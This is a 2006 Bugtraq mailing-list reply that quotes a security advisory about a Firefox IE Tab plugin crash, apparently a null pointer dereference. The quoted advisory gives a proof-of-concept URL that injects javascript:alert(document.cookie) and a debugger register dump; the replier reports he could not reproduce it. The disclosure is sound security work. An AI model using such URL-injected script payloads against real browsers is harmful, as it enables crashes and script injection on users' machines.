[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Firefox (with IETab Plugin) Null Pointer Dereferences Bug
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: Firefox (with IETab Plugin) Null Pointer Dereferences Bug
- From: "Roman Daszczyszak" <romandas@xxxxxxxxx>
- Date: Fri, 19 May 2006 09:13:27 +0200
Using Firefox 1.5.0.3 and IE Tab 1.0.9 on a Windows XP Pro SP2 +
latest patches, I was unable to reproduce this using your PoC
provided.
I created a new tab, pasted the URL you provided into it, hit enter
and received an 'Action Cancelled' page from IE. Neither Firefox nor
IE crashed.
Was there something more to the bug that I am not seeing?
Regards,
Roman
---------- Forwarded message ----------
From: "Debasis Mohanty" <debasis@xxxxxxxxxxxxxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Date: Wed, 17 May 2006 23:48:23 +0530
Subject: Firefox (with IETab Plugin) Null Pointer Dereferences Bug
Firefox (with IETab Plugin) Null Pointer Dereferences Bug
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vendor: Mozilla
Product: FireFox with IE Tab
Tested On:
FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)
Introduction:
IETab (https://addons.mozilla.org/firefox/1419/) is a recently released
(April 12, 2006) plugin for Firefox. It is used to browse IE (only) specific
sites under Firefox. Guess what ?? You can run windowsupdate under FireFox
;-)
Bug Details:
Firefox with the IETab installed crashes when ietab plugin is unable to
handle specific javascripts. It seems to be a null pointer dereference bug.
For more details refer the PoC section.
Proof-of-Concept:
Copy & paste the following URL to the Firefox addressbar and press enter -
chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);
Note: This test will not work if IETab is not installed.
The Registers details after the crash:
(1e4.3e0): Access violation - code c0000005 (first chance) First chance
exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0 nv up ei pl zr na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10 mov dx,[eax]
ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0 nv up ei pl zr na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10 mov dx,[eax]
ds:0023:00000000=????
For more vulnerabilities : http://hackingspirits.com/vuln-rnd/vuln-rnd.html
Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com